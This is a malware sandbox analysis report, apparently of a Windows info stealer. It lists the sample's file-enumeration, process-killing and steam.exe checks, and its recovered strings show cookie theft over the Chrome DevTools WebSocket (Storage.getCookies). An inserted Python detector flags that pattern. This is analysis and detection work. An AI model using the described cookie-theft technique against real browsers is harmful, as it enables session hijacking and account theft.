                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 6e858667ea8aaaf40c0fa820ee338070bead074f11a85ea341fdd9f3710221b5
                                • Instruction ID: c2e8fa930570f908209a8cee4e0ce4f62203f45c075b7f814bdcdf03e56f17d7
                                • Opcode Fuzzy Hash: 6e858667ea8aaaf40c0fa820ee338070bead074f11a85ea341fdd9f3710221b5
                                • Instruction Fuzzy Hash: 60619471D10208ABCB21EF74EC49ADE77B9BF48311F0055A9FA49B7245DB35AA44CFA0
                                APIs
                                • wsprintfA.USER32 ref: 00E5D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5D564
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5D584
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5D59E
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5D5E3
                                • lstrcat.KERNEL32(?,016CF2A8), ref: 00E5D5F7
                                • lstrcat.KERNEL32(?,?), ref: 00E5D60B
                                • lstrcat.KERNEL32(?,?), ref: 00E5D61C
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5D62E
                                • lstrcat.KERNEL32(?,?), ref: 00E5D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5D737
                                • FindClose.KERNEL32(00000000), ref: 00E5D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 226105c9adf2001ea7bcee2448316b2b481126849486af7318135f7dae17cca9
                                • Instruction ID: c80bafc04d973109c9357c1a4f82b6c807df0a51aa2ce75b32ace310d3925a16
                                • Opcode Fuzzy Hash: 226105c9adf2001ea7bcee2448316b2b481126849486af7318135f7dae17cca9
                                • Instruction Fuzzy Hash: D8616571D102199FCB20EF74DC89ADE77B8AF48315F0099A9FA49B3241DB35AA45CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: db886ce30756d2b497c8e22df5656a00f43a8dd3dd482291dc0bae688bfecd22
                                • Instruction ID: 68a8b1d5fef49a77099f3b3f0c046e9d9bef05bd205664bfe801ded08628d675
                                • Opcode Fuzzy Hash: db886ce30756d2b497c8e22df5656a00f43a8dd3dd482291dc0bae688bfecd22
                                • Instruction Fuzzy Hash: BBA27871E412199FDB20DFA8D8807EDBBB2EF48340F1485AAD519B7281DB315E85CF90
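The strings recovered from this function (an HTTP/1.1 request carrying Connection: Upgrade, Upgrade: websocket, Sec-WebSocket-Key and Sec-WebSocket-Version: 13 against a ws:// endpoint, followed by {"id":1,"method":"Storage.getCookies"}) are the client side of a Chrome DevTools Protocol session: the browser is started with a remote debugging port and asked for its cookies over the debugging WebSocket instead of through the on-disk cookie database. The Python below is an added example, not code from the report, from Joe Sandbox or from the sample: it parses such a handshake, computes the Sec-WebSocket-Accept a server would answer with (RFC 6455), unmasks the first client frame and flags a loopback DevTools endpoint being asked for cookies. The port 9222, the /devtools/page/ target ID and every byte of the sample traffic are constructed assumptions, not captured from this analysis.

```python
"""Detect Chrome DevTools Protocol (CDP) cookie dumping from a raw WebSocket
handshake plus the first client frame. Added example; sample traffic below is
constructed, not captured from the analysed sample."""
import base64
import hashlib
import json
import re

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"   # RFC 6455 section 1.3
# CDP methods that return cookies for the whole browser profile.
COOKIE_METHODS = {"Storage.getCookies", "Network.getAllCookies", "Network.getCookies"}


def parse_upgrade(raw: bytes) -> dict:
    """Parse an HTTP/1.1 WebSocket upgrade request into lowercased headers plus
    the request path. Raises ValueError if it is not a valid upgrade."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    m = re.match(r"GET (\S+) HTTP/1\.1$", lines[0])
    if not m:
        raise ValueError("not an HTTP/1.1 GET")
    hdrs = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    if (hdrs.get("upgrade", "").lower() != "websocket"
            or "upgrade" not in hdrs.get("connection", "").lower()):
        raise ValueError("not a WebSocket upgrade")
    if hdrs.get("sec-websocket-version") != "13":
        raise ValueError("unsupported Sec-WebSocket-Version")
    key = base64.b64decode(hdrs.get("sec-websocket-key", ""), validate=True)
    if len(key) != 16:
        raise ValueError("Sec-WebSocket-Key must encode 16 random bytes")
    hdrs["path"] = m.group(1)
    return hdrs


def accept_value(key_b64: str) -> str:
    """Sec-WebSocket-Accept the server must answer with (RFC 6455 section 4.2.2)."""
    digest = hashlib.sha1((key_b64 + WS_GUID).encode()).digest()
    return base64.b64encode(digest).decode()


def unmask_text_frame(frame: bytes) -> str:
    """Decode one client-to-server text frame (FIN set, opcode 1, payload < 126 bytes).
    Clients MUST mask (RFC 6455 section 5.3), so a 4-byte key follows the length byte."""
    if frame[0] != 0x81 or not frame[1] & 0x80:
        raise ValueError("expected a masked, single text frame")
    length = frame[1] & 0x7F
    if length >= 126:
        raise ValueError("extended payload lengths not handled here")
    mask, payload = frame[2:6], frame[6:6 + length]
    return bytes(b ^ mask[i % 4] for i, b in enumerate(payload)).decode()


def classify(raw_request: bytes, first_frame: bytes) -> dict:
    """Verdict: a loopback /devtools/ endpoint plus a cookie-reading CDP method is
    the pattern a stealer uses to pull cookies out of a browser it launched itself."""
    hdrs = parse_upgrade(raw_request)
    msg = json.loads(unmask_text_frame(first_frame))
    host = hdrs.get("host", "").rsplit(":", 1)[0]
    loopback = host in ("127.0.0.1", "localhost", "[::1]")
    devtools = hdrs["path"].startswith("/devtools/")
    method = msg.get("method", "")
    return {
        "loopback_devtools": loopback and devtools,
        "cdp_method": method,
        "cookie_theft": loopback and devtools and method in COOKIE_METHODS,
    }


def mask_frame(text: str, mask: bytes = b"\x12\x34\x56\x78") -> bytes:
    """Build a masked client text frame (only used to construct the sample below)."""
    payload = text.encode()
    masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return bytes([0x81, 0x80 | len(payload)]) + mask + masked


# Constructed sample: the handshake shape the decoded strings describe, aimed at a
# hypothetical page target; the JSON mirrors the decoded Storage.getCookies string.
SAMPLE_KEY = base64.b64encode(bytes(range(16))).decode()
SAMPLE_REQUEST = (
    "GET /devtools/page/ABCDEF HTTP/1.1\r\n"
    "Host: 127.0.0.1:9222\r\n"
    "Connection: Upgrade\r\n"
    "Upgrade: websocket\r\n"
    f"Sec-WebSocket-Key: {SAMPLE_KEY}\r\n"
    "Sec-WebSocket-Version: 13\r\n\r\n"
).encode()
SAMPLE_FRAME = mask_frame('{"id":1,"method":"Storage.getCookies"}')

if __name__ == "__main__":
    print(classify(SAMPLE_REQUEST, SAMPLE_FRAME))
```

On a real host the same pattern is visible earlier than the traffic: a browser process created with a remote debugging switch by a parent that is not the user's shell, which is the telemetry to alert on if loopback traffic is not captured.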
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E523D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E523F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52402
                                • lstrlen.KERNEL32(\*.*), ref: 00E5240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E52436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E52486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 1731116a61e8e5354af8c0217184df2cbeb509077b94da5f9ec65410c652fecc
                                • Instruction ID: 16c31379caa86310c0a0fbf35b6dcc15ce8cd5ab1ffee3e31a874d1a48932dd1
                                • Opcode Fuzzy Hash: 1731116a61e8e5354af8c0217184df2cbeb509077b94da5f9ec65410c652fecc
                                • Instruction Fuzzy Hash: 304192316102059BCB32EF28FC85A9E77E4AF55319F40712CFE5AB7211CB349C058BA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /. $>6?o$>6?o$N{'$O<}$Tk$a/$q]o$u!?0$TC$s[k
                                • API String ID: 0-3277970166
                                • Opcode ID: 7af03f5bc3619e116d836610b9c1a02f270dd2bc6c6cc44fa55dca226d02bfd0
                                • Instruction ID: 31b2f950401cb64c0b9b7ca60f73dfc069efdca65db6c57c33a013594bcf73d9
                                • Opcode Fuzzy Hash: 7af03f5bc3619e116d836610b9c1a02f270dd2bc6c6cc44fa55dca226d02bfd0
                                • Instruction Fuzzy Hash: 03B23BF3A0C2049FE3046E2DDC8567AF7E9EF94720F1A463DEAC4C3744EA7598058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0'M$<~M$C0{{$G(~$kq}:$kq}:$oxnZ$oxnZ$1?_$Q_}$Sn
                                • API String ID: 0-4287790051
                                • Opcode ID: e8774a9b09164ed3ecd150c961b4a14fbad2ee932b84dcd5442525b86ff4e8f7
                                • Instruction ID: 5b59399b0d7ca08fbefc5099f2e8d5a58e50a00f7418b334edf5a53fea0580e9
                                • Opcode Fuzzy Hash: e8774a9b09164ed3ecd150c961b4a14fbad2ee932b84dcd5442525b86ff4e8f7
                                • Instruction Fuzzy Hash: E0B206F3A082049FE3046E2DEC8567AFBE5EF94720F1A493DEAC487744E63598058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +m%$Iy|$St{g$at>$o!Y$qU}$vw%$&Zv$@\_$Mz_
                                • API String ID: 0-1759963497
                                • Opcode ID: 66f9a6b2456c34e552454f63dba24ba7790ea7b66362e849df3d4dc3107e1619
                                • Instruction ID: 9201da41dcfbf21d88ecd97956b19b3a9dc5d35fc1e24b558c4e99109a9a14ba
                                • Opcode Fuzzy Hash: 66f9a6b2456c34e552454f63dba24ba7790ea7b66362e849df3d4dc3107e1619
                                • Instruction Fuzzy Hash: 22B206F3A0C6049FE304AE2DEC8567ABBE9EFD4720F1A453DE6C5C3344EA3558058696
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E646B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E646C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E646DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 00E646ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E64702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E64711
                                • CloseHandle.KERNEL32(00000000), ref: 00E64718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E64726
                                • CloseHandle.KERNEL32(00000000), ref: 00E64731
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 2d10301dea9901b52d2090ab56a59aa772ec14cd5ee8fb54c0aa40063f45586b
                                • Instruction ID: 358394ed2c6fae1cf7445d9d327605be514210581fa1914aaace2b04d82e1c4c
                                • Opcode Fuzzy Hash: 2d10301dea9901b52d2090ab56a59aa772ec14cd5ee8fb54c0aa40063f45586b
                                • Instruction Fuzzy Hash: C201C471A51114AFE7325B60EC8CFFA377CEB45B65F040189FA85F2084EF79A9508BA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &9^w$*V_\$*l|v$Gu#P$JQ$OpZ{$\O&$m5u}$Gz
                                • API String ID: 0-4023005196
                                • Opcode ID: 5d1257935a97247b391890f4a7871d6fdc9c0cb9b16b57774354433d13b88fd8
                                • Instruction ID: d2336d549d4a5c0e027115536e4b810683d09580d9e6dc04013024724ae730db
                                • Opcode Fuzzy Hash: 5d1257935a97247b391890f4a7871d6fdc9c0cb9b16b57774354433d13b88fd8
                                • Instruction Fuzzy Hash: CCB228F3A0C204AFE7086E2DEC8567AFBE9EF94320F16453DE6C5C3344EA7558058696
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00E64628
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E64638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E6464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00E64660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E64672
                                • CloseHandle.KERNEL32(00000000), ref: 00E6467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
